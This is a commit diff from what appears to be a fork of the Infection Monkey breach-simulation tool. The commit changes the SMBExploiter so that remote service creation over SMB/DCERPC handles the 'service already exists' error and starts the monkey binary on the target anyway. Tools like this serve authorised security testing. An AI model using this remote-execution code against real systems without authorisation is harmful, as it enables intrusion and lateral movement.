p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Agent: Handle case where SMB service already exists in SMBExploiter

This commit is contained in:
Mike Salvatore 2022-03-18 12:25:45 -04:00
parent abb05730b8
commit 75dd26b3df
1 changed files with 17 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
monkey/infection_monkey/exploit/smbexec.py
View File

@ -1,6 +1,7 @@
from logging import getLogger from logging import getLogger
from impacket.dcerpc.v5 import scmr, transport from impacket.dcerpc.v5 import scmr, transport
from impacket.dcerpc.v5.scmr import DCERPCSessionError
from common.utils.attack_utils import ScanStatus, UsageEnum from common.utils.attack_utils import ScanStatus, UsageEnum
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
@ -128,13 +129,22 @@ class SMBExploiter(HostExploiter):
sc_handle = resp["lpScHandle"] sc_handle = resp["lpScHandle"]
# start the monkey using the SCM # start the monkey using the SCM
resp = scmr.hRCreateServiceW( try:
scmr_rpc, resp = scmr.hRCreateServiceW(
sc_handle, scmr_rpc,
SMBExploiter.SMB_SERVICE_NAME, sc_handle,
SMBExploiter.SMB_SERVICE_NAME, SMBExploiter.SMB_SERVICE_NAME,
lpBinaryPathName=cmdline, SMBExploiter.SMB_SERVICE_NAME,
) lpBinaryPathName=cmdline,
)
except DCERPCSessionError as err:
if err.error_code == 0x431:
logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
else:
self.exploit_result.error_message = str(err)
return self.exploit_result
service = resp["lpServiceHandle"] service = resp["lpServiceHandle"]
try: try:
scmr.hRStartServiceW(scmr_rpc, service) scmr.hRStartServiceW(scmr_rpc, service)